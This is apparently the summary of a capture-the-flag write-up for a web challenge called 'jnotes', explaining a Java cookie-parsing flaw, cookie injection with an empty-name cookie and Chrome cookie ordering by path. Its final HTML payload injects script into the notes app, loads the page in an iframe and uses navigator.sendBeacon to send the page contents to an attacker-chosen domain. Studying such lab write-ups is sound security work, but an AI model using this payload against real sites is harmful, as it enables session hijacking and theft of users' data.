# tl;dr

* Java mishandles the cookies such that when there is a cookie with a `"`, it will take all the cookies until there is a `"` as that cookie's value  
* We can set empty cookies using javascript `document.cookie="=value";`  
* Use that to set a new `note` cookie by adding `note` in the value `document.cookie='=note="';`  
* Make our cookie first by giving path as `//` as chrome sends cookies with longer paths first  
* Now create an iframe with `//` as src and read its innerHTML

## Final Payload

```html

<html>  
<body>  
<form method="POST" action="https://jnotes.mc.ax/create">  
<input id="p" name="note" value="" >  
</form>  
<script>  
document.querySelector("#p").value = `</textarea>  
<\x73cript>  
document.cookie='=note=";path=//';  
const frame = document.createElement('iframe');  
frame.src = "https://jnotes.mc.ax//";  
document.body.appendChild(frame);  
frame.onload = () => {  
navigator.sendBeacon("https://your.domain.com",frame.contentWindow.document.body.innerHTML);  
}  
</\x73cript>`;  
document.forms[0].submit();  
</script>  
</body>  
</html>  
```

Original writeup (https://lu513n.com/blog/posts/jnotes/).